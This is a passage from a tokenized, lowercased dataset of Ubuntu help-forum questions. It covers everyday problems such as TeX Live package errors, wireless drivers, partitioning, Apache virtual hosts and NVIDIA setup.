amd64 ( 2.8.12.1-6ubuntu2 ) , gnome-media : amd64 ( 3.4.0-0ubuntu3.1 ) , nautilus : amd64 ( 3.4.2-0ubuntu9 ) , compiz-plugins-default : amd64 ( 0.9.7.12-0ubuntu3 ) , gvfs-fuse : amd64 ( 1.12.1-0ubuntu1.2 ) , libgnome-desktop-3-2 : amd64 ( 3.4.2-0ubuntu0.2 ) , gnome-session-bin : amd64 ( 3.2.1-0ubuntu8 ) , x11-utils : amd64 ( 7.6+4ubuntu0.1 ) , libunity-2d-private0 : amd64 ( 5.14.0-0ubuntu2 ) , nautilus-share : amd64 ( 0.7.3-1ubuntu2 ) , gvfs-backends : amd64 ( 1.12.1-0ubuntu1.2 ) , gnome-settings-daemon : amd64 ( 3.4.2-0ubuntu0.6.5 ) , libnux-2.0-0 : amd64 ( 2.14.1-0ubuntu1 ) , libtinyxml2.6.2 : amd64 ( 2.6.2-1build1 ) , libglew1.6 : amd64 ( 1.6.0-4 ) , gnome-session : amd64 ( 3.2.1-0ubuntu8 ) , libgl1-mesa-glx : amd64 ( 8.0.4-0ubuntu0.7 ) , libglapi-mesa : amd64 ( 8.0.4-0ubuntu0.7 ) , apturl-common : amd64 ( 0.5.1ubuntu3 ) , libqt4-opengl : amd64 ( 4.8.1-0ubuntu4.6 ) , unity-2d-spread : amd64 ( 5.14.0-0ubuntu2 ) , unity-2d-panel : amd64 ( 5.14.0-0ubuntu2 ) , eog : amd64 ( 3.4.2-0ubuntu1.1 ) , libwxgtk2.8-0 : amd64 ( 2.8.12.1-6ubuntu2 ) , indicator-power : amd64 ( 2.0-0ubuntu1 ) , libunity-core-5.0-5 : amd64 ( 5.20.0-0ubuntu3 ) , compiz-gnome : amd64 ( 0.9.7.12-0ubuntu3 ) , opencpn : amd64 ( 3.2.2-0~precise1 ) , apturl : amd64 ( 0.5.1ubuntu3 ) , libgnome-media-profiles-3.0-0 : amd64 ( 3.0.0-1 ) , unity-2d-shell : amd64 ( 5.14.0-0ubuntu2 ) , nautilus-sendto : amd64 ( 3.0.1-2ubuntu2 ) , unity-greeter : amd64 ( 0.2.9-0ubuntu1.2 ) , libvisual-0.4-plugins : amd64 ( 0.4.0.dfsg.1-7 ) , indicator-session : amd64 ( 0.3.96-0ubuntu1 ) , gnome-screensaver : amd64 ( 3.4.1-0ubuntu1 ) , indicator-datetime : amd64 ( 0.3.94-0ubuntu2 ) , libgles2-mesa : amd64 ( 8.0.4-0ubuntu0.7 ) , gnome-control-center : amd64 ( 3.4.2-0ubuntu0.13.1 ) , brasero : amd64 ( 3.4.1-0ubuntu1.1 ) , nux-tools : amd64 ( 2.14.1-0ubuntu1 ) , compiz : amd64 ( 0.9.7.12-0ubuntu3 ) , gvfs : amd64 ( 1.12.1-0ubuntu1.2 ) , ubuntuone-client-gnome : amd64 ( 3.0.1-0ubuntu1 ) , compiz-plugins-main-default : amd64 ( 0.9.7.0~bzr19-0ubuntu10.1 ) , libglu1-mesa : amd64 ( 8.0.4-0ubuntu0.7 ) , libglewmx1.6 : amd64 ( 1.6.0-4 ) , gvfs-daemons : amd64 ( 1.12.1-0ubuntu1.2 ) end-date : 2014-03-30 23:39:09
441686	problem loading latex koma-script and fontspec after freshly installing vanilla texlive	i have just installed vanilla texlive according to the tug instructions on my ubuntu 13.10 . a standard minimal example properly compiles the way it is supposed to do : \documentclass [ ngerman ] { article } \usepackage { babel } \begin { document } test \end { document } however , as soon as i start loading one of the koma classes or the fontspec package , it wo n't compile : \documentclass [ ngerman ] { scrartcl } \usepackage { babel } \begin { document } test \end { document } when trying to compile this example with lualatex , it will give me the following error message : ! latex error : file `scrartcl.cls ' not found . \documentclass { article } \usepackage { fontspec } \begin { document } test \end { document } and compiling this example with lualatex returns : ! latex error : file `fontspec.sty ' not found . i am confused about this because i thought that both fontspecand koma-script are standard parts of texlive . also , when i type texdoc fontspec or texdoc scrguien in the terminal , i do get the proper manual for the respective packages . edit : the koma classes ( e.g . scrartcl.cls ) are saved in the directory where the install-tl-script installed them by default : /usr/local/texlive/2013/texmf-dist/tex/latex/koma-script fontspec.sty is saved in : /usr/local/texlive/2013/texmf-dist/tex/latex/fontspec the lualatex compiler can be found in : /usr/local/texlive/2013/bin/x86_64-linux/ now comes the interesting part , the respective permissions : -rw-r -- r -- 1 root root 127355 dez 27 00:18 scrartcl.cls -rw-r -- r -- 1 root root 9565 mai 22 2013 fontspec.sty lrwxrwxrwx 1 root root 6 aug 15 2009 lualatex - > luatex
441687	how do i access my samsung galaxy nexus ?	i have a samsung galaxy nexus and it wont mount on ubuntu 12.04 . how should i get it to mount ? i tried using gmpt , but it wo n't work for my cell phone .
441689	keep keyboard from waking laptop ?	i have an ideapad y400 running ubuntu 13.10 . i have been having a problem where , while i am carrying the laptop , the screen will push one of the keys and wake the laptop up . is there any way to : disable the keyboard when the laptop goes to sleep , keep the keyboard from waking the laptop , or make the laptop go to back to sleep if it is woken while closed ?
441695	unable to load websites on second ip	i have a server with 2 ip addresses . all the websites on one of the ips loads ok , but non on the second . i can ping the second ip but traceroute to one of the websites gives theeducationchannel.info : name or service not known can not handle `` host '' cmdline arg `theeducationchannel.info ' on position 1 ( argc 1 ) i get no errors when restarting apache2 my /etc/hosts file reads 127.0.0.1 localhost 111.90.150.92 server11362.abc.com server11362 virtual hosts 111.90.150.92:80 website.biz 111.90.150.92:80 website.info 111.90.150.92:80 website.com 111.90.150.92:80 website.com 111.90.150.93:8080 website.org 111.90.150.93:8080 website.info 111.90.150.93:8080 website.com 111.90.150.93.8080 website.org the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters and /etc/apache2/httpd.conf reads namevirtualhost 111.90.150.92:80 namevirtualhost 111.90.150.93:8080
441698	open lastlog file from outside	currently we took a backup of the lastlog file from server1 and took it to server2 , however , we cant open it since the lastlog command opens only the lastlog of the server we are currently in , but not the lastlog we copied from server1 . we of course ca n't delete or override server2 's lastlog file . can you tell us please how can we open such file from terminal ?
441699	install ubuntu on second internal drive fully seperate from windows	let 's say i have drive c : , and drive d : . drive c : has windows 7 on it , and drive d : is currently completely empty . i would like to install ubuntu on drive d : without adding a bootloader/grub to the regular startup of my computer . so if i restart it , or turn it on , it just normally boots to windows 7 , and once in windows 7 , it ca n't even access or detect drive d : but if i enter bios or advanced startup during a boot , and choose to boot from drive d : , then i boot into ubuntu . is this possible ? thanks for your time .
441700	microphone shuts off when audacity starts	i 'm using ubuntu 12.04 lts for my church 's sound-room for recording and cd-burning . the setup is great with a gnome3 desktop and audacity . i 'm using the microphone jack on the computer 's sound card for the audio input from the sound board . when the computer is turned on initially the sound input settings under system settings shows : 1 . ) the right input , ie . the microphone , and that 2 . ) the input is on . when i start up audacity for the first time , the input turns itself off ( i have kept the sound settings on and it literally changes in front of me ) and i have to go back to the audio settings and turn it back on so that we can record . i tried using the line-in jack instead to see if it was a problem specific , but had the same results . its a small problem really , but kind of annoying . its not a problem with the jacks or pulse not working , they just cut themselves off . is this an ubuntu setting , pulse setting , audacity setting or some other setting that i had n't thought of ? i can give more information if required , i 'm just not sure where to begin looking for the problem .
441701	what 's wrong with my cat command ?	i lent a friend a computer with ubuntu 12.04 lts on it , and he messed up the cat command . $ cat testfile.txt cat : meow ! $ can someone tell me how to fix this ? please ? output of which cat : /bin/cat
441705	will programs installed on xp work on ubuntu after installation ?	if i install ubuntu as an os on a windows xp system ( not as dual-boot ) , what happens to the functionality of the other programs already installed inside windows xp ? do they continue to function on ubuntu or will i need to reinstall them on ubuntu ? i 've seen questions regarding partitions , but not about the programs themselves .
441706	side by side operating system	i have a pc with ms-w7 installed . it is 64 bit with a 1tb hard drive . its fast enough and has enough ram to take on a side installation of ubuntu . i understand that when i install ubuntu , the install program will define another partition on the drive for the ubuntu os . so instead of a drive with one 1t partition ( c : ) , i will have a drive with two 500gb partitions , one for w7 and the other for ubuntu . my question : if i choose to remove either os for any reason , what happens to the partition that was associated with the removed system . does it disappear and i am left with only one half a hard drive or do i get the partition back to use with the remaining os ? georgebee
441708	how can i make my ubuntu machine discoverable by name for ssh from other linux machines ?	i can not ssh to my ubuntu laptop by host name from other linux machines on the network . my ubuntu laptop is a member of the corporate domain and can see all the other network computers . i can putty to it from windows computers by name but when i try to ssh to it by name from another linux machine i get the error : ssh : could not resolve hostname something : name or service not known how do i make it discoverable to linux machines on the network ? i 've tried changing the smb.conf file to include netbios name = something , and i 've tried changing the dns proxy = dns address followed by a restart of the samba server , but neither or both yielded any results . i 'm running ubuntu 13.10 . thanks , cole
441713	how do i install ubuntu studio from a usb flash drive ?	so i have the standard ubuntu 13.10 , and i wanted to install ubuntu studio . the only way i can do that is through a flash drive , so i downloaded the newest version of ubuntu studio , and used unetbootin to put the iso on the flash drive . once that 's done , i went to boot from my flash drive in the bios , and all i get is a flashing cursor in the top left . i tried waiting for over an hour and nothing happened . i am not knowledgeable in how any of this works to be honest , i just want to know if there are any solutions ?
441714	live dvd does not boot even after disabling fast boot and secure boot	i 'm trying to install ubuntu with a live dvd , i 'm running elementary os at the moment . my live dvd was burnt in the correct way . i 've already disabled fast boot , secure boot , intel smart response technology . but my dvd is not booting . i 'm desperate , what can i do ? help please ! ! ! !
441715	mysqldb on brython ?	hi there i 'm working on a server-based point of sale for a sports club , and downloaded mysqldb lib so that i can access and modify it through python scripts , they work great ! , so i decided to use brython for the graphic interface , following the steps on brython page i downloades the brython_site_mirror for developers , and running `` server.py '' , to mount the server on my ip address port 8000 , everything was working fine , until i tried to use the mysqldb getting the following error , 127.0.0.1 - - [ 31/mar/2014 16:55:48 ] `` get /src/lib/mysqldb/__init__.py ? v=tgbzi1cy http/1.1 '' 404 - thinking that i might have to install mysqldb lib into /scr/lib/mysqldb ( on the brython project directory ) i downloaded it on the directory again running wget http : //sourceforge.net/projects/mysql-python/files/mysql-python/1.2.3/mysql-python-1.2.3.tar.gz and then tar xzvf mysql-python-1.2.3.tar.gz the thing is that when i run sudo python setup.py clean it gives me the following errors bojack @ linux-bojack : ~/brython1.4_site_mirror-20131221-111525/src/lib/mysql-python-1.2.3 $ sudo python setup.py clean sh : 1 : mysql_config : not found traceback ( most recent call last ) : file `` setup.py '' , line 15 , in < module > metadata , options = get_config ( ) file `` /home/bojack/brython1.4_site_mirror-20131221-111525/src/lib/mysql-python- 1.2.3/setup_posix.py '' , line 43 , in get_config libs = mysql_config ( `` libs_r '' ) file `` /home/bojack/brython1.4_site_mirror-20131221-111525/src/lib/mysql-python-1.2.3/setup_posix.py '' , line 24 , in mysql_config raise environmenterror ( `` % s not found '' % ( mysql_config.path , ) ) environmenterror : mysql_config not found now i have no clue why installing the library on the brython directory does n't work : / am i doing something wrong ? ? ? or is there another way brython can access the mysqldb lib ? ? ? here is the html code of the page if it is of some use thanks in advance
441716	why is the text i piont to in an adobe menu invisible ?	i have ubuntu 13.10 . i recently installed adobe reader 9 and the text on the drop down menus is visible , but when i put my mouse over an option it becomes invisible . i think it is highlighting it in while instead of some other color . what do i do about this ?
441720	extending partition ( merge two partitions on same disk ) non gparted	first off i see many answers which include gparted , i do not wish to use gparted . i wish to use a console based application such as fdisk . hello ! i 'll keep this short , my computers harddisks and partitions look like this : sda 8g -sda1 1g // this is swap -sda2 3g // this is my current root -sda3 4g // this is my current /home sdb 8g // this is my new harddrive ! -sdb1 8g // this will be my new /home ! what i want to do is : i wish to replace sda3 ( 4g ) which is my current home with my new harddrive sdb1 ( 8g ) . after that i wish to `` merge '' sda3 into sda2 . i wish for the following : sda 8g -sda1 1g // this is swap -sda2 7g // i want this to be my root sdb 8g -sdb1 8g // i want this to be my home i have mounted the sdb to home now with no problem by editing the fstab uuid for home . i am however stuck with trying to extend sda2 with the 4g of sda3 . i 've been trying to look at tutorials and the closest i 've gotten to was something to do with fdisk and resize2fs . however i 'm trying to do this without having to delete the entire sda partition ( the sda3 partition i can delete though ) .
441721	computer shut down for no reason and its not a overheating problem	computer shut down usually when ı watch a quality video or play dota 2 sometimes with no reason first ı thought it was a overheating problem ı install sensors and looked cpu temp its like this atk0110-acpi-0 adapter : acpi interface vcore voltage : +0.92 v ( min = +0.80 v , max = +1.60 v ) +3.3v voltage : +3.32 v ( min = +2.97 v , max = +3.63 v ) +5v voltage : +5.01 v ( min = +4.50 v , max = +5.50 v ) +12v voltage : +12.01 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 2039 rpm ( min = 600 rpm , max = 7200 rpm ) chassis fan speed : 0 rpm ( min = 600 rpm , max = 7200 rpm ) cpu temperature : +41.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +31.0°c ( high = +45.0°c , crit = +75.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +25.1°c ( high = +70.0°c ) ( crit = +83.5°c , hyst = +80.5°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 40.54 w ( crit = 124.95 w ) what is chassis fan spped and why it that 0 and ı look var/log/syslog ı found this apr 1 02:20:23 makina gnome-session [ 1297 ] : glib-critical : g_environ_setenv : assertion 'value ! = null ' failed apr 1 02:20:23 makina dbus [ 731 ] : [ system ] activating service name='org.freedesktop.udisks2 ' ( using servicehelper ) apr 1 02:20:23 makina udisksd [ 1863 ] : udisks daemon version 2.1.3 starting apr 1 02:20:24 makina dbus [ 731 ] : [ system ] successfully activated service 'org.freedesktop.udisks2'
441722	is it possible to search and remove files that are n't part of a package ?	so , i 've wrecklessly installed tarballs into / and /usr thinking this is what i 'm supposed to do ! apparently its not and updating now kind of is difficult . i 'm wondering , save for a full blown reinstall if there is a way to clean out hand installed libraries . i think i might have a way to do it , i found another question asking how to find out what package a file belongs to . i imagine if it has no package i can nuke it ?
441723	help with netgear wireless card [ solved ]	ok so i spent all day yesterday trying to get my wireless adapter to work with ubuntu 13.10 . i have internet access on my windows install , but it 's not working on ubuntu . downloaded and installed ndiswrapper and utils , downloaded bcmwlhigh6 , as it corresponds to my wireless device ( netgear wnda3100v2 , broadcom4323 , id 0846:9011 ) . running ndiswrapper -l shows the driver as installed and the device id is showing up as well . but i still have no wireless ! please help ! this is really only my second day using linux . i 'm completely at a loss . update : ok , i have gotten ndiswrapper to install correctly , so i 'm no longer getting a fatal error when i run a modprobe . however , i do n't get anything back from that , it just goes to a new line in the terminal . going to try what was suggested and install ndiswrapper-dkms ( just tried this , however , i 'm going to have to install the package dkms before i can install the one for ndiswrapper ) , and i 'll see if i can get either bcmwlhigh5 or bcmwlhigh6 to work . will post back when i have done this . update 04/03 : alright guys , thanks for all your help . i 've gotten the wireless card up and running , and for those of you struggling with this particular wireless adapter , here 's how : downloaded and installed the latest version of ndiswrapper . downloaded and installed ndiswrapper-source , ndiswrapper-common , ndiswrapper-utils , and ndiswrapper-dkms ( requires package dkms prior to installation ) . the driver i found to actually work was neither bcmwlhigh5 nor bcmwlhigh6 . it was actually an open-source driver called bcmn43xx64 ( or bcmn43xx32 , if you 're running a 32-bit os ) . downloaded this and installed via ndiswrapper . once the driver was installed , i ran sudo ndiswrapper -m , followed by sudo modprobe ndiswrapper . i honestly was n't expecting much , but when i ran iwconfig it came back showing my wireless adapter ! thanks everyone for your help ! and if you have trouble with this adapter , i hope you found this informative and useful !
441729	replace windows when ubuntu is already installed	i installed ubuntu with windows installer . now i want to delete windows 7 , how should i do it ? thanks
441730	no system tray detected	ok , i realize this question has been answered , but none of those answers are complete so maybe my i will have better luck . i have to machines , one running ubuntu 12.04lts , and one current with ubuntu 13.04 . both are running the most current version of hplip available . i ca n't stress that enough . both versions of hplip are current . every time i start either machine i get this annoying no system tray detected error . i understand , through researching the issue , that i apparently need to set a delay somewhere . however , none of the answers given actually explain how to accomplish this . any clarity on this would be greatly appreciated . potentially relevant : both are running cairo dock . i 'm not sure if that matters as the problem is clearly not limited to those running cairo dock , but better too much info than not enough .
441731	shadows wo n't disable xubuntu 12.04	i am currently running xubuntu 12.04 . i dislike the menu and window drop shadows , therefore i went to window manager tweaks , then navigated to the compositor tab . inside the compositor tab , i unchecked the areas that said `` show shadows under regular windows '' and `` show shadows under popup windows . '' this worked for a few minutes , then the shadows reappeared . is there another place i have to disable the shadows ? any help is appreciated , thank you : )
441732	can i install ubuntu 32 bit ?	my pc have 8gb ram . recent i install ubuntu 32 bit and i saw the system show 8gb . should i install ubuntu 64 bit or 32 bit ?
441733	wpa_supplicant and ndiswrapper causing general protection fault	i managed to install the driver for my rtl8190 wifi adapter using ndiswrapper . wlan0 is up and running . however when i try to connect to a wpa2 protected network using network-manager , i get this : [ 623.153087 ] general protection fault : 0000 [ # 1 ] smp [ 623.153113 ] modules linked in : rndis_host cdc_ether usbnet ndiswrapper ( of ) nls_iso8859_1 ( f ) parport_pc ( f ) ppdev ( f ) bnep rfcomm bluetooth snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) snd_rawmidi ( f ) coretemp snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) mac_hid snd ( f ) lpc_ich microcode ( f ) soundcore ( f ) psmouse ( f ) serio_raw ( f ) dm_multipath ( f ) scsi_dh ( f ) lp ( f ) parport ( f ) btrfs ( f ) zlib_deflate ( f ) libcrc32c ( f ) dm_raid45 xor ( f ) dm_mirror ( f ) dm_region_hash ( f ) dm_log ( f ) hid_generic usbhid hid usb_storage ( f ) firewire_ohci nouveau mxm_wmi wmi firewire_core video ( f ) i2c_algo_bit crc_itu_t ( f ) ttm drm_kms_helper drm ahci ( f ) libahci ( f ) e1000e ( f ) [ last unloaded : ndiswrapper ] [ 623.153305 ] cpu 0 [ 623.153312 ] pid : 954 , comm : wpa_supplicant tainted : pf o 3.8.0-19-generic # 29-ubuntu medionpc ms-7502/ms-7502 [ 623.153326 ] rip : 0010 : [ < ffffc900146a94d6 > ] [ < ffffc900146a94d6 > ] 0xffffc900146a94d5 [ 623.153342 ] rsp : 0018 : ffff8801245b76d8 eflags : 00010246 [ 623.153350 ] rax : 000000000000000c rbx : ffffc9001474f080 rcx : ffffc9001474c000 [ 623.153358 ] rdx : ffff8801245b7708 rsi : ffffc9001474f868 rdi : ffffc9001474c000 [ 623.153367 ] rbp : ffff8801245b7c01 r08 : 0000000000000000 r09 : 0000000000000000 [ 623.153375 ] r10 : 0000000000004449 r11 : ffffc9001474f0a0 r12 : 0000000000000000 [ 623.153384 ] r13 : 0000000000014c40 r14 : ffff8800c8462800 r15 : ffff8801245b7bc0 [ 623.153394 ] fs : 00007fd2f697e740 ( 0000 ) gs : ffff88012fc00000 ( 0000 ) knlgs:0000000000000000 [ 623.153404 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 [ 623.153412 ] cr2 : 00000000004b09a0 cr3 : 000000012451a000 cr4 : 00000000000407f0 [ 623.153421 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 [ 623.153430 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 [ 623.153439 ] process wpa_supplicant ( pid : 954 , threadinfo ffff8801245b6000 , task ffff880126232e80 ) [ 623.153448 ] stack : [ 623.153453 ] 0000000000f25000 ffffc9001474f080 ffffc9001474f868 ffffc9001474c000 [ 623.153469 ] 0000000000000000 0000000000000000 ffffc9001474f8a8 000000000000000c [ 623.153486 ] 0000000000000001 ffffc900146ae960 ffffc9001474c000 ffff8801245b7c18 [ 623.153501 ] call trace : [ 623.153513 ] [ < ffffffff8101ba95 > ] ? native_sched_clock+0x15/0x80 [ 623.153525 ] [ < ffffffff810135d1 > ] ? __switch_to+0x181/0x4a0 [ 623.153537 ] [ < ffffffff816caece > ] ? _raw_spin_lock+0xe/0x20 [ 623.153550 ] [ < ffffffff81094db9 > ] ? update_curr+0x99/0x170 [ 623.153559 ] [ < ffffffff81092768 > ] ? __enqueue_entity+0x78/0x80 [ 623.153569 ] [ < ffffffff81096cc2 > ] ? enqueue_entity+0x382/0x9a0 [ 623.153597 ] [ < ffffffffa04451e8 > ] ? win2lin_ndissettimer_2+0x18/0x20 [ ndiswrapper ] [ 623.153610 ] [ < ffffffff81044b49 > ] ? default_spin_lock_flags+0x9/0x10 [ 623.153621 ] [ < ffffffff816cb1ce > ] ? _raw_spin_lock_irqsave+0x2e/0x40 [ 623.153640 ] [ < ffffffffa0447c02 > ] ? lin2win6+0x22/0x2d [ ndiswrapper ] [ 623.153650 ] [ < ffffffff816c88ad > ] ? mutex_lock+0x1d/0x50 [ 623.153673 ] [ < ffffffffa043dbcb > ] ? mp_request+0x18b/0x430 [ ndiswrapper ] [ 623.153691 ] [ < ffffffffa0427213 > ] ? set_essid+0x83/0x120 [ ndiswrapper ] [ 623.153709 ] [ < ffffffffa04294c5 > ] ? iw_set_essid+0x105/0x1c0 [ ndiswrapper ] [ 623.153721 ] [ < ffffffff8169bb06 > ] ? ioctl_standard_iw_point+0x176/0x420 [ 623.153739 ] [ < ffffffffa04293c0 > ] ? iw_set_encodeext+0x2c0/0x2c0 [ ndiswrapper ] [ 623.153750 ] [ < ffffffff8169bf72 > ] ? ioctl_standard_call+0xb2/0xd0 [ 623.153760 ] [ < ffffffff8169cb50 > ] ? iw_handler_get_private+0x70/0x70 [ 623.153770 ] [ < ffffffff8169bec0 > ] ? call_commit_handler+0x40/0x40 [ 623.153779 ] [ < ffffffff8169b45e > ] ? wireless_process_ioctl+0x16e/0x1b0 [ 623.153789 ] [ < ffffffff8169c094 > ] ? wext_handle_ioctl+0x74/0xd0 [ 623.153801 ] [ < ffffffff815cb85e > ] ? dev_ioctl+0xce/0x5e0 [ 623.153811 ] [ < ffffffff815b0542 > ] ? sock_ioctl+0xf2/0x2b0 [ 623.153822 ] [ < ffffffff811a5919 > ] ? do_vfs_ioctl+0x99/0x570 [ 623.153832 ] [ < ffffffff811a6885 > ] ? poll_select_copy_remaining+0xf5/0x150 [ 623.153842 ] [ < ffffffff811a5e81 > ] ? sys_ioctl+0x91/0xb0 [ 623.153852 ] [ < ffffffff816d379d > ] ? system_call_fastpath+0x1a/0x1f [ 623.153859 ] code : 48 85 d2 74 09 44 0f b7 c0 e8 b7 57 ff ff 48 8d 46 40 48 8d 54 24 30 48 8b cf 48 89 44 24 30 0f b7 86 48 01 00 00 66 89 44 24 38 < 0f > 28 44 24 30 66 0f 7f 44 24 30 e8 ba f4 ff ff 80 bb 24 a7 06 [ 623.154008 ] rip [ < ffffc900146a94d6 > ] 0xffffc900146a94d5 [ 623.154019 ] rsp < ffff8801245b76d8 > [ 623.168378 ] -- - [ end trace c5064c244c256901 ] -- - any idea ?
441737	how do i get my windows phone to recognize my media ?	i recently bought a windows phone , a nokia lumia 920 , and am running ubuntu 13.10 on my laptop . when i connect the phone via usb , it recognizes it fine , and i can navigate the phone 's folders , and copy files ( mp3s & jpgs specifically ) , but the phone does not acknowledge the presence of the images or the music . the google searches i 've tried have yielded nothing useful , as the sites i 've been to assume i 'm running windows or mac , and i have n't tried anything yet , since i have no idea where to begin . it 's worth stating that i 'm really kinda new to ubuntu , so if you answer , please dummy it down for me !
441739	installing ubuntu 13.10 via usb with uefi	i 'm trying to install ubuntu as a dual boot on a windows 8.1 machine . i have a bootable usb drive , and it shows up in the boot menu , but when i try to select the usb to boot from that and install ubuntu , the screen just flashes and nothing happens , bringing the boot menu back up .
441740	ca n't open /proc/i8k : no such file or directory	i keep getting this error message when ever i try to use i8kctl fan 1 1 . i can easily fix it during my current session by entering in sudo modprobe i8k . if there is a way , can someone explain to me how to make it where i do n't have to enter anything in , my fans start out on low ? i still want to be able to control my fans . i would just like to not have to use the sudo modprobe i8k command every time i turn on my computer . i am very new to ubuntu , so i 'm sorry if i do n't understand what you are talking about . i am running ubuntu 13.10 on a dell inspiron 3521 .
441744	pressing enter produces ^m instead of a newline	for example , if i am tail -fing a file or reading user input , < enter > will produce ^m in the terminal instead of ending the read or adding a newline to stdout . ^j works fine . i 'm sshing into the ubuntu system , if that matters . this happens to me both in zsh and bash . one solution i played with is remapping the ^m to ^j in zsh , but that seems like it would n't fix the root problem . anyone know what might be causing this ? edit : to answer some questions , i 'm sshing into ubuntu from osx . i 'm using iterm and zsh . i also forgot to mention that i 'm using tmux on the ubuntu machine . edit 2 : missed a question . when i type ctrl-v enter i get ^m ( both on osx and ubuntu ) . edit 3 : on osx and ubuntu echo $ term produces screen-256color .
441745	how to connect to a windows shared printer ?	i am new to linux . just installed ubuntu 12.04 lts to replace windows xp . the only thing i ca n't get to work is connecting to a windows 7 shared printer . is this possible ? i got it to work . i installed the printer driver and then connected to printer with samba .
441746	ubuntu studio 13.10 unable to shutdown d620 when bios wifi enabled	with wireless enabled in the d620 bios , the machine hangs in the shutdown panel at shutdown or restart ; pressing and holding the power button shuts it down . with wireless disabled , it shuts down quickly and normally . how can i use wireless on the d620 with ubuntu studio 13.10 . ( it worked ok with lts 13.04 ) .
441748	where are upstart log messages on ubuntu 13.x ?	on ubuntu 12.04 , i can find upstart log messages in /var/log/syslog . commands : # initctl log-priority info # initctl emit hello log : apr 1 01:56:56 precise64 kernel : [ 8365.820425 ] init : connection from private client apr 1 01:56:56 precise64 kernel : [ 8365.821130 ] init : handling hello event on ubuntu 13.10 , the messages do not appear in syslog or anywhere else under the /var/log directory , although commands like logger hello work as expected . should i be looking for them somewhere else ? is there a configuration setting i need to change somewhere ? thereâs a question on server fault from somebody who seems to be having the same problem on ubuntu 13.04 , and more here and here that may also be describing the same problem . unfortunately , these questions offer no leads for the problem .
441749	start text mode installer from 13.10 dvd ?	how can i start the text mode installer for 13.10 ( without resorting to the minimal .iso ) ? i encountered a seemingly persistent bug where the installer hangs at `` where are you ? '' 12.04 - installer hangs at `` where are you ? '' 12.04 - installer gets stuck at `` where are you ? '' 11.04 - installer hangs at `` where are you ? '' 10.04 - alternate cd workaround for installer hanging at `` where are you ? ''
441750	is there a keyboard switcher for ubuntu that displays a country flag instead of two-letter code ?	is there a way to make keyboard indicator in ubuntu display country flags instead of two-letter codes ? this feature of switchit ! layout switcher for windows is the only one i miss in ubuntu . or , maybe there is a way to display overlay on a screen briefly , when the layout is switched ? like this one in apple products : added : i have ubuntu 13.10
441752	installing known softwware and get a warning on xubuntu 12.04 , but not with ubuntu 12.04	when installing known good software on xubuntu 12.04 i receive a warning of installing a package that violates the standards that is n't allowed . can ignore it and do the install . on ubuntu 12.04 , no such problem . what is it with xubntu ?
441754	is there a subtotaling feature hidden in the calculate program ?	is there a subtotaling function hidden in the calculate program ? supposedly there is a facility for assigning values to variables , which would provide that functionality , but i ca n't find that either . i 'm running kubuntu 12.04 . i get the impression that gcalctool has been replaced by calculate .
441755	installing nvidia 720m driver in ubuntu 12.04 with verification	** question ** my laptop model is asus f550cc with nvidia 720m ( not optimus ) graphics card . i 'm confused with what method should i really use to install nvidia 720m in my ubuntu . should it be via ppa , additional drivers or nvidia 's website ? what i did was to install the two nvidia drivers that appeared in the additional drivers upon fresh ubuntu installation . with the image file attached , it can be seen that ubuntu can not detect my graphics card . i also installed mesa-utils to run glxinfo but i got error messages as depicted in the image file attached below . when i run lspci | grep nvidia , it showed my driver . i 'm really confused . one says it can not be detected , another said it can . what should i believe in ? also how do i really test if nvidia is correctly installed ( e.g . running some sort of test program ) ? also did i installed it correctly ? here is the detail on how i installed my ubuntu upto nvidia : installed ubuntu 12.04 x64 without installing updates upon fresh installation . ( for faster installation ) installed one of the proprietary drivers and restart . installed the other one and restart . installed mesa-utils . final update : troubleshooting process : check the comments also running sudo nvidia-settings shows the nvidia gui i also run sudo nvidia-xconfig and sudo reboot now i got this ugly video resolution . i also run glxinfo again but got the same error message but the details does not display unknown anymore but none at all . here is the /etc/x11/xorg.conf after i executed sudo reboot.. # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.20 ( buildmeister @ swio-display-x86-rhel47-05 ) wed oct 30 18:20:53 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection running dmesg | grep nvidia gives nvidia-settings configuration window
441756	software & updates can not be launched from gnome control center	i can not launch software & updates from gnome control center . problem started after i updated to saucy . however , running sudo software-properties-gtk works fine . and this is what i have in terminal : $ gnome-control-center fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 32 , in < module > import aptsources file `` /usr/lib/python3/dist-packages/aptsources/__init__.py '' , line 4 , in < module > apt_pkg.init ( ) systemerror : e : opening configuration file /etc/apt/apt.conf.d/00aptitude - ifstream : :ifstream ( 13 : permission denied ) , e : opening configuration file /etc/apt/apt.conf - ifstream : :ifstream ( 13 : permission denied ) error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes 